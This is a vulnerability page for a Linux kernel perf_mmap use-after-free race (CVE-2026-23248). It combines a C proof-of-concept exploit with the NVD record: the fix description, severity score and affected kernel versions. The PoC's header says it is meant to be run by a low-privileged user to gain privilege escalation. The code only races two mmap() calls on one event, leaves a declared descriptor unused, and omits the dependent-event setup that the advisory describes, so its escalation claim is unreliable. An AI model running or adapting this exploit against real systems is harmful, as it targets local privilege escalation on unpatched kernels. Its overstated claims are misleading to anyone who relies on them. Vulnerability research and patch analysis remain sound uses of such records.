CVE-2026-23248

/* * CVE-2026-23248 PoC - Linux kernel perf_mmap UAF * This PoC demonstrates the race condition in perf_mmap * Compile: gcc -o cve202623248_poc cve202623248_poc.c -lpthread * Run as low-privileged user to trigger privilege escalation */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <pthread.h> #include <unistd.h> #include <sys/mman.h> #include <sys/ioctl.h> #include <linux/perf_event.h> #include <linux/hw_breakpoint.h> #include <sys/syscall.h> #define PAGE_SIZE 4096 static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, int cpu, int group_fd, unsigned long flags) { return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags); } void *trigger_mmap_race(void *arg) { int *fd = (int *)arg; /* Trigger mmap with small size to increase failure probability */ void *addr = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, *fd, 0); if (addr == MAP_FAILED) { perror("mmap failed (expected in race condition)"); } else { printf("First mmap succeeded at %p\n", addr); /* Try to trigger cleanup path */ munmap(addr, PAGE_SIZE); } return NULL; } void *concurrent_mmap_access(void *arg) { int *fd = (int *)arg; usleep(100); /* Small delay to synchronize race */ /* Concurrent mmap attempt */ void *addr = mmap(NULL, PAGE_SIZE * 2, PROT_READ | PROT_WRITE, MAP_SHARED, *fd, 0); if (addr == MAP_FAILED) { perror("Concurrent mmap failed"); } else { printf("Concurrent mmap succeeded at %p\n", addr); munmap(addr, PAGE_SIZE * 2); } return NULL; } int main() { struct perf_event_attr pe; int fd1, fd2; pthread_t thread1, thread2; memset(&pe, 0, sizeof(struct perf_event_attr)); pe.type = PERF_TYPE_SOFTWARE; pe.size = sizeof(struct perf_event_attr); pe.config = PERF_COUNT_SW_CPU_CLOCK; pe.disabled = 1; pe.exclude_kernel = 0; /* Create parent event */ fd1 = perf_event_open(&pe, 0, -1, -1, 0); if (fd1 == -1) { perror("perf_event_open for parent failed"); return 1; } /* Enable event to allow inheritance */ ioctl(fd1, PERF_EVENT_IOC_ENABLE, 0); printf("Starting race condition trigger...\n"); printf("Target: CVE-2026-23248 - perf_mmap race condition\n"); /* Create threads to trigger race condition */ pthread_create(&thread1, NULL, trigger_mmap_race, &fd1); pthread_create(&thread2, NULL, concurrent_mmap_access, &fd1); pthread_join(thread1, NULL); pthread_join(thread2, NULL); close(fd1); printf("Test completed. Check dmesg for refcount warnings.\n"); return 0; }

{"cve": {"id": "CVE-2026-23248", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-18T11:16:16.863", "lastModified": "2026-05-21T18:45:54.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/core: Fix refcount bug and potential UAF in perf_mmap\n\nSyzkaller reported a refcount_t: addition on 0; use-after-free warning\nin perf_mmap.\n\nThe issue is caused by a race condition between a failing mmap() setup\nand a concurrent mmap() on a dependent event (e.g., using output\nredirection).\n\nIn perf_mmap(), the ring_buffer (rb) is allocated and assigned to\nevent->rb with the mmap_mutex held. The mutex is then released to\nperform map_range().\n\nIf map_range() fails, perf_mmap_close() is called to clean up.\nHowever, since the mutex was dropped, another thread attaching to\nthis event (via inherited events or output redirection) can acquire\nthe mutex, observe the valid event->rb pointer, and attempt to\nincrement its reference count. If the cleanup path has already\ndropped the reference count to zero, this results in a\nuse-after-free or refcount saturation warning.\n\nFix this by extending the scope of mmap_mutex to cover the\nmap_range() call. This ensures that the ring buffer initialization\nand mapping (or cleanup on failure) happens atomically effectively,\npreventing other threads from accessing a half-initialized or\ndying ring buffer."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nperf/core: Corrección de error de conteo de referencias y potencial UAF en perf_mmap\n\nSyzkaller informó una advertencia de refcount_t: adición en 0; uso después de liberación en perf_mmap.\n\nEl problema es causado por una condición de carrera entre una configuración de mmap() fallida y un mmap() concurrente en un evento dependiente (por ejemplo, usando redirección de salida).\n\nEn perf_mmap(), el ring_buffer (rb) se asigna y se establece en event-&gt;rb con el mmap_mutex retenido. El mutex es entonces liberado para realizar map_range().\n\nSi map_range() falla, se llama a perf_mmap_close() para limpiar. Sin embargo, dado que el mutex fue liberado, otro hilo que se adjunta a este evento (a través de eventos heredados o redirección de salida) puede adquirir el mutex, observar el puntero event-&gt;rb válido e intentar incrementar su conteo de referencias. Si la ruta de limpieza ya ha reducido el conteo de referencias a cero, esto resulta en un uso después de liberación o una advertencia de saturación de conteo de referencias.\n\nEsto se corrige al extender el alcance de mmap_mutex para cubrir la llamada a map_range(). Esto asegura que la inicialización y el mapeo del búfer de anillo (o la limpieza en caso de fallo) ocurra de manera atómica y efectiva, evitando que otros hilos accedan a un búfer de anillo medio inicializado o en proceso de terminación."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.14", "versionEndExcluding": "6.18.17", "matchCriteriaId": "E367EC2E-72DB-4555-9BE2-A5B9C97AD4E6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.7", "matchCriteriaId": "69245D10-0B71-485E-80C3-A64F077004D3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/77de62ad3de3967818c3dbe656b7336ebee461d2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ac7ecb65af170a7fc193e7bd8be15dac84ec6a56", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c27dea9f50ed525facb62ef647dddc4722456e07", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}